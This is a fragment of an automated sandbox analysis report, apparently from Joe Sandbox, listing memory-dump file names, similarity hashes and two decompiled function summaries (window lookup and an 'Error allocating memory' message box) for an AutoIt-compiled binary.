                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                              • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                              • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                              • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                              Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message_doexit
                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                              • API String ID: 1993061046-4017498283
                                                                                              • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                              • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                              • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                              • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D